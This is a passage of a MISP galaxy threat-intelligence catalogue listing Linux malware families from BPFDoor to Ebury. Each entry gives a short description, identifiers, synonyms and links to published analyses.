- https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor - webarchive
- https://www.bleepingcomputer.com/news/security/stealthier-version-of-linux-bpfdoor-malware-spotted-in-the-wild/ - webarchive
- https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game - webarchive
- https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf - webarchive
- https://www.mandiant.com/resources/blog/chinese-espionage-tactics - webarchive
- https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html - webarchive
- https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/ - webarchive
- https://troopers.de/troopers22/talks/7cv8pz/ - webarchive
- https://twitter.com/cyb3rops/status/1523227511551033349 - webarchive
- https://elastic.github.io/security-research/intelligence/2022/05/04.bpfdoor/article/# - webarchive
- https://unfinished.bike/fun-with-the-new-bpfdoor-2023 - webarchive
- https://twitter.com/CraigHRowland/status/1523266585133457408 - webarchive
- https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/ - webarchive
- https://exatrack.com/public/Tricephalic_Hellkeeper.pdf - webarchive
- https://nikhilh-20.github.io/blog/cbpf_bpfdoor/ - webarchive
- https://lolcads.github.io/posts/2023/12/bpf_memory_forensics_with_volatility3/ - webarchive
- https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896 - webarchive
- https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
brute_ratel
Internal MISP references
UUID 2fa4ac4e-3f89-4fd0-b4fd-2c776dcf69d8
which can be used as unique global reference for brute_ratel
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bvp47
Pangu Lab discovered this backdoor during a forensic investigation in 2013. They refer to related incidents as "Operation Telescreen".
Internal MISP references
UUID 0492f9bf-3c5d-4c17-993b-2b53d0fb06f7
which can be used as unique global reference for Bvp47
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.bvp47 - webarchive
- https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group_ii.en.pdf - webarchive
- https://www.pangulab.cn/files/The_Bvp47_a_top-tier_backdoor_of_us_nsa_equation_group.en.pdf - webarchive
- https://www.pangulab.cn/en/post/the_bvp47_a_top-tier_backdoor_of_us_nsa_equation_group/ - webarchive
- https://exatrack.com/public/Tricephalic_Hellkeeper.pdf - webarchive
- https://thehackernews.com/2022/02/chinese-experts-uncover-details-of.html - webarchive
- https://www.bleepingcomputer.com/news/security/nsa-linked-bvp47-linux-backdoor-widely-undetected-for-10-years/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Caja
Linux malware cross-compiled for x86, MIPS, ARM. XOR encoded strings, 13 commands supported for its C&C, including downloading, file modification and execution and ability to run shell commands.
Internal MISP references
UUID 06816c22-be7c-44db-8d0d-395ab306bb9b
which can be used as unique global reference for Caja
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Caligula
According to Avast Decoded, Caligula is a multiplatform IRC bot that can perform DDoS attacks. It is written in Go and distributed in ELF files targeting Intel 32/64-bit code, as well as ARM 32-bit and PowerPC 64-bit. It is based on the Hellabot open source project.
Internal MISP references
UUID c936f24c-c04a-4cab-9ac6-6384a2d4c283
which can be used as unique global reference for Caligula
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Capoae
XMRig-based mining malware written in Go.
Internal MISP references
UUID c1b0528b-c674-4c76-8e1d-5846ba8af261
which can be used as unique global reference for Capoae
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CDorked
This is in the same family as Ebury and Calfbot, and is also likely related to DarkLeech.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular CDorked.
Known Synonyms |
---|
CDorked.A |
Internal MISP references
UUID bb9eaaec-97c9-4014-94dd-129cecf31ff0
which can be used as unique global reference for CDorked
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdorked - webarchive
- https://www.welivesecurity.com/2013/05/02/the-stealthiness-of-linuxcdorked-a-clarification/ - webarchive
- https://www.symantec.com/security-center/writeup/2013-050214-5501-99 - webarchive
- https://blog.sucuri.net/2014/03/windigo-linux-analysis-ebury-and-cdorked.html - webarchive
- https://blogs.cisco.com/security/linuxcdorked-faqs - webarchive
- https://www.welivesecurity.com/2013/04/26/linuxcdorked-new-apache-backdoor-in-the-wild-serves-blackhole/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CDRThief
Internal MISP references
UUID 27d06ac9-42c4-433a-b1d7-660710d9e8df
which can be used as unique global reference for CDRThief
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cephei
Internal MISP references
UUID baa0704b-50d8-48af-91e1-049f30f422cc
which can be used as unique global reference for Cephei
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cetus
Internal MISP references
UUID 7a226df2-9599-4002-9a38-b044e16f76a9
which can be used as unique global reference for Cetus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chalubo
Sophos describes this malware as a DDoS bot, with its name originating from ChaCha-Lua-bot due to its use of the ChaCha cipher and Lua. Variants exist for multiple architectures, and it incorporates code from XorDDoS and Mirai.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Chalubo.
Known Synonyms |
---|
ChaChaDDoS |
Internal MISP references
UUID af91c777-93f7-4b7f-981f-141478972011
which can be used as unique global reference for Chalubo
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.chalubo - webarchive
- https://news.sophos.com/en-us/2018/10/22/chalubo-botnet-wants-to-ddos-from-your-server-or-iot-device/ - webarchive
- https://blog.centurylink.com/the-pumpkin-eclipse/ - webarchive
- https://blog.lumen.com/the-pumpkin-eclipse/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chaos (ELF)
Multi-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.
Internal MISP references
UUID ef03e3c3-32d5-483a-bd1f-97dd531c4bca
which can be used as unique global reference for Chaos (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chapro
Internal MISP references
UUID 700366d8-4036-4e48-9a5f-bd6e09fb9b6b
which can be used as unique global reference for Chapro
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Chisel (ELF)
Chisel is an open-source project by Jaime Pillora (jpillora) that allows tunneling TCP and UDP connections via HTTP. It is available across platforms and written in Go. While benign in itself, Chisel has been utilized by multiple threat actors. For example, it was observed by SentinelOne during a PYSA ransomware campaign, where it was used to achieve persistence and as a backdoor. Github: https://github.com/jpillora/chisel
Internal MISP references
UUID e5600185-39b7-49a0-bd60-a6806c7d47dd
which can be used as unique global reference for Chisel (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Clop (ELF)
ELF version of the Clop ransomware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Clop (ELF).
Known Synonyms |
---|
Cl0p |
Internal MISP references
UUID 3d11ec52-9ca8-4d83-99d4-6658f306e8e4
which can be used as unique global reference for Clop (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.clop - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://www.helpnetsecurity.com/2023/02/07/cl0p-ransomware-decryptor-linux/ - webarchive
- https://www.sentinelone.com/labs/cl0p-ransomware-targets-linux-systems-with-flawed-encryption-decryptor-available/ - webarchive
- https://www.bleepingcomputer.com/news/security/march-2023-broke-ransomware-attack-records-with-459-incidents/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cloud Snooper
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cloud Snooper.
Known Synonyms |
---|
Snoopy |
Internal MISP references
UUID 0b1c514d-f617-4380-a28c-a1ed305a7538
which can be used as unique global reference for Cloud Snooper
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.cloud_snooper - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophoslabs-cloud-snooper-report.pdf - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://news.sophos.com/wp-content/uploads/2020/02/CloudSnooper_report.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ConnectBack
ConnectBack malware is a type of malicious software designed to establish unauthorized connections from an infected system to a remote server. Once a victim's device is compromised, ConnectBack creates a covert channel for communication, allowing the attacker to remotely control and gather sensitive information from the compromised system.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ConnectBack.
Known Synonyms |
---|
Getshell |
Internal MISP references
UUID 82c57d1b-c11b-44f7-9675-2f0d23fb543f
which can be used as unique global reference for ConnectBack
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Conti (ELF)
Ransomware
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Conti (ELF).
Known Synonyms |
---|
Conti Locker |
Internal MISP references
UUID c1ab8323-ce61-409a-80f3-b945c8ffcd42
which can be used as unique global reference for Conti (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.conti - webarchive
- https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.youtube.com/watch?v=cYx7sQRbjGA - webarchive
- https://resources.prodaft.com/wazawaka-report - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf - webarchive
- https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022 - webarchive
- https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again - webarchive
- https://damonmccoy.com/papers/Ransomware_eCrime22.pdf - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html - webarchive
- https://securelist.com/new-ransomware-trends-in-2022/106457/ - webarchive
- https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike - webarchive
- https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cpuminer (ELF)
This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.
Internal MISP references
UUID 8196b6f6-386e-4499-b269-4e5c65f74141
which can be used as unique global reference for Cpuminer (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Cr1ptT0r
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Cr1ptT0r.
Known Synonyms |
---|
CriptTor |
Internal MISP references
UUID 196b20ec-c3d1-4136-ab94-a2a6cc150e74
which can be used as unique global reference for Cr1ptT0r
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.cr1ptt0r - webarchive
- https://www.bleepingcomputer.com/news/security/cr1ptt0r-ransomware-infects-d-link-nas-devices-targets-embedded-systems/ - webarchive
- https://resolverblog.blogspot.com/2019/02/d-link-dns-320-nas-cr1ptt0r-ransomware.html - webarchive
- https://resolverblog.blogspot.com/2019/03/de-cr1pt0r-tool-cr1pt0r-ransomware.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CronRAT
A malware written in Bash that hides in the Linux calendar system on February 31st. Observed in relation to Magecart attacks.
Internal MISP references
UUID c49062cc-ceef-4794-9d8a-93ede434ecfd
which can be used as unique global reference for CronRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
CyclopsBlink
According to CISA, Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, and which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices. Cyclops Blink has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread. The actor has so far primarily deployed Cyclops Blink to WatchGuard and ASUS devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.
Internal MISP references
UUID 76d4b754-e025-41c5-a767-7b00a39bd255
which can be used as unique global reference for CyclopsBlink
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.cyclops_blink - webarchive
- https://www.cisa.gov/uscert/ncas/alerts/aa22-054a - webarchive
- https://www.theregister.com/2022/03/18/cyclops_asus_routers/ - webarchive
- https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyclops-blink-sets-sights-on-asus-routers/Appendix_Cyclops%20Blink%20Sets%20Sights%20on%20ASUS%20Routers.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/cisa-warns-orgs-of-watchguard-bug-exploited-by-russian-state-hackers/ - webarchive
- https://www.shadowserver.org/news/shadowserver-special-reports-cyclops-blink/ - webarchive
- https://www.bleepingcomputer.com/news/security/asus-warns-of-cyclops-blink-malware-attacks-targeting-routers/ - webarchive
- https://www.justice.gov/opa/video/attorney-general-merrick-b-garland-announces-enforcement-actions-disrupt-and-prosecute - webarchive
- https://github.com/trendmicro/research/blob/main/cyclops_blink/c2-scripts/check.py - webarchive
- https://www.justice.gov/opa/press-release/file/1491281/download - webarchive
- https://www.bleepingcomputer.com/news/security/us-disrupts-russian-cyclops-blink-botnet-before-being-used-in-attacks/ - webarchive
- https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview - webarchive
- https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html - webarchive
- https://attack.mitre.org/groups/G0034 - webarchive
- https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dacls (ELF)
According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.
Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.
Internal MISP references
UUID 2e5e2a7e-4ee5-4954-9c92-e9b21649ae1b
which can be used as unique global reference for Dacls (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls - webarchive
- https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/ - webarchive
- https://blog.netlab.360.com/dacls-the-dual-platform-rat/ - webarchive
- https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought - webarchive
- https://securelist.com/apt-trends-report-q2-2020/97937/ - webarchive
- https://vblocalhost.com/uploads/VB2021-Park.pdf - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/ - webarchive
- https://www.sygnia.co/mata-framework - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
- https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dark
Mirai variant exploiting CVE-2021-20090 and CVE-2021-35395 for spreading.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dark.
Known Synonyms |
---|
Dark.IoT |
Internal MISP references
UUID d499e7ad-332f-4057-b31d-a69916408057
which can be used as unique global reference for Dark
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.dark - webarchive
- https://www.radware.com/getmedia/18d24c2d-c092-4a61-9ad6-ebb92b7a49b8/Alert_Realtek_SDK.aspx - webarchive
- https://www.lacework.com/blog/kinsing-dark-iot-botnet-among-threats-targeting-cve-2022-26134/ - webarchive
- https://twitter.com/ESETresearch/status/1440052837820428298?s=20 - webarchive
- https://blogs.juniper.net/en-us/threat-research/attacks-continue-against-realtek-vulnerabilities - webarchive
- https://www.radware.com/getmedia/d312a5fa-2d8d-4c1e-b31e-73046f24bf35/Alert-Dark-OMIGOD.aspx - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkCracks
A sophisticated payload delivery and upgrade framework, discovered in 2024. DarkCracks exploits compromised GLPI and WordPress sites to function as Downloaders and C2 servers.
Internal MISP references
UUID 043c46fc-b98a-438e-b071-3ac76380f082
which can be used as unique global reference for DarkCracks
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dark Nexus
Internal MISP references
UUID dfba0c8f-9d06-448b-817e-6fffa1b22cb9
which can be used as unique global reference for Dark Nexus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.darknexus - webarchive
- https://www.stratosphereips.org/blog/2020/6/8/dark-nexus-the-old-the-new-and-the-ugly - webarchive
- https://www.trendmicro.com/en_us/research/21/l/the-evolution-of-iot-linux-malware-based-on-mitre-att&ck-ttps.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkSide (ELF)
Internal MISP references
UUID 61796628-c37b-4284-9aa4-9f054cc6c3c2
which can be used as unique global reference for DarkSide (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.darkside - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/chemical-distributor-pays-44-million-to-darkside-ransomware/ - webarchive
- https://www.trendmicro.com/en_us/research/21/e/darkside-linux-vms-targeted.html - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/ - webarchive
- https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html - webarchive
- https://blog.gigamon.com/2021/05/17/tracking-darkside-and-ransomware-the-network-view/ - webarchive
- https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside - webarchive
- https://www.intel471.com/blog/darkside-ransomware-shut-down-revil-avaddon-cybercrime - webarchive
- https://www.mcafee.com/blogs/other-blogs/mcafee-labs/darkside-ransomware-victims-sold-short/ - webarchive
- https://blog.group-ib.com/blackmatter2 - webarchive
- https://www.wsj.com/articles/colonial-pipeline-ceo-tells-why-he-paid-hackers-a-4-4-million-ransom-11621435636 - webarchive
- https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/ - webarchive
- https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html - webarchive
- https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/ - webarchive
- https://abcnews.go.com/Politics/biden-speak-colonial-pipeline-attack-americans-face-gasoline/story?id=77666212 - webarchive
- https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/ - webarchive
- https://www.secureworks.com/blog/ransomware-groups-use-tor-based-backdoor-for-persistent-access - webarchive
- https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/ - webarchive
- https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/ - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://therecord.media/popular-hacking-forum-bans-ransomware-ads/ - webarchive
- https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group - webarchive
- https://www.crowdstrike.com/blog/how-to-defend-against-conti-darkside-revil-and-other-ransomware/ - webarchive
- https://www.ic3.gov/Media/News/2021/211101.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://otx.alienvault.com/pulse/60d0afbc395c24edefb33bb9 - webarchive
- https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/ - webarchive
- https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/ - webarchive
- https://www.databreaches.net/a-former-darkside-listing-shows-up-on-revils-leak-site/ - webarchive
- https://pylos.co/2021/05/13/mind-the-air-gap/ - webarchive
- https://www.youtube.com/watch?v=qxPXxWMI2i4 - webarchive
- https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/ - webarchive
- https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/ - webarchive
- https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims - webarchive
- https://securityscorecard.com/blog/new-evidence-supports-assessment-that-darkside-likely-responsible-for-colonial-pipeline-ransomware-attack-others-targeted - webarchive
- https://www.elliptic.co/blog/darkside-ransomware-has-netted-over-90-million-in-bitcoin - webarchive
- https://twitter.com/GelosSnake/status/1451465959894667275 - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service - webarchive
- https://www.technologyreview.com/2021/05/24/1025195/colonial-pipeline-ransomware-bitdefender/ - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-made-90-million-in-just-nine-months/ - webarchive
- https://www.crowdstrike.com/blog/how-ransomware-adversaries-reacted-to-the-darkside-pipeline-attack/ - webarchive
- https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/ - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/ - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout - webarchive
- https://twitter.com/JAMESWT_MHT/status/1388301138437578757 - webarchive
- https://www.youtube.com/watch?v=NIiEcOryLpI - webarchive
- https://blog.group-ib.com/blackmatter# - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DarkRadiation
Internal MISP references
UUID 39be337b-8a9a-4d71-949b-5efd6248fc80
which can be used as unique global reference for DarkRadiation
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DDG
First activity observed in October 2017. DDG is a botnet with P2P capability that targets cryptocurrency mining (Monero).
Internal MISP references
UUID 5c42585b-ea92-4fe2-8a79-bb47a3df67ad
which can be used as unique global reference for DDG
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.ddg - webarchive
- https://blog.netlab.360.com/ddg-mining-botnet-jin-qi-huo-dong-fen-xi/ - webarchive
- https://blog.netlab.360.com/ddg-a-mining-botnet-aiming-at-database-servers/ - webarchive
- https://blog.netlab.360.com/ddg-botnet-round-x-is-there-an-ending/ - webarchive
- https://blog.netlab.360.com/threat-alert-ddg-3013-is-out/ - webarchive
- https://blog.netlab.360.com/old-botnets-never-die-and-ddg-refuse-to-fade-away/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ddoor
Internal MISP references
UUID 07f48866-647c-46b0-a0d4-29c81ad488a8
which can be used as unique global reference for ddoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DEADBOLT
DEADBOLT is a Linux ransomware written in Go, targeting QNAP NAS devices worldwide. Files are encrypted with AES-128 and have the .deadbolt extension appended to their file names.
Internal MISP references
UUID b37c9ba2-f1b0-4a2f-9387-7310939d2189
which can be used as unique global reference for DEADBOLT
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.deadbolt - webarchive
- https://www.trendmicro.com/en_us/research/22/f/closing-the-door-deadbolt-ransomware-locks-out-vendors-with-mult.html - webarchive
- https://community.riskiq.com/article/1601124b - webarchive
- https://securelist.com/new-ransomware-trends-in-2022/106457/ - webarchive
- https://www.bleepingcomputer.com/news/security/new-deadbolt-ransomware-targets-qnap-devices-asks-50-btc-for-master-key/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Decoy Dog RAT
Internal MISP references
UUID 6452720d-bd35-4c55-8178-ed0dd86f4c53
which can be used as unique global reference for Decoy Dog RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Denonia
Cado discovered this malware, written in Go and targeting AWS Lambda environments.
Internal MISP references
UUID d5d9bb86-715d-4d86-a4d2-ab73085d1b0c
which can be used as unique global reference for Denonia
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Derusbi (ELF)
Internal MISP references
UUID 494dcdfb-88cb-456d-a95a-252ff10c0ba9
which can be used as unique global reference for Derusbi (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DISGOMOJI
Internal MISP references
UUID 1f6098a1-2395-4329-8865-49602638f45a
which can be used as unique global reference for DISGOMOJI
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Dofloo
Dofloo (aka AESDDoS) is a popular malware used to create large scale botnets that can launch DDoS attacks and load cryptocurrency miners to the infected machines.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Dofloo.
Known Synonyms |
---|
AESDDoS |
Internal MISP references
UUID ffb5789f-d7e6-4723-a447-e5bb2fe713a0
which can be used as unique global reference for Dofloo
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Doki
Internal MISP references
UUID a5446b35-8613-4121-ada4-c0b1d6f72851
which can be used as unique global reference for Doki
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.doki - webarchive
- https://www.intezer.com/container-security/watch-your-containers-doki-infecting-docker-servers-in-the-cloud/ - webarchive
- https://www.securecoding.com/blog/all-about-doki-malware/ - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DoubleFantasy (ELF)
Internal MISP references
UUID a41d8c89-8229-4936-96c2-4b194ebaf858
which can be used as unique global reference for DoubleFantasy (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
DreamBus
Internal MISP references
UUID 22ff8eac-d92e-4c6e-829b-9b565d90eddd
which can be used as unique global reference for DreamBus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Ebury
This payload was used to compromise kernel.org in August 2011 and also hit cPanel Support, which in turn led to the infection of quite a few cPanel servers. It is a credential-stealing payload that steals SSH keys, passwords, and potentially other credentials.
This family is part of a wider range of tools which are described in detail in the Operation Windigo whitepaper by ESET.
Internal MISP references
UUID ce79265c-a467-4a17-b27d-7ec7954688d5
which can be used as unique global reference for Ebury
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury - webarchive
- https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/ - webarchive
- https://security.web.cern.ch/security/advisories/windigo/windigo.shtml - webarchive
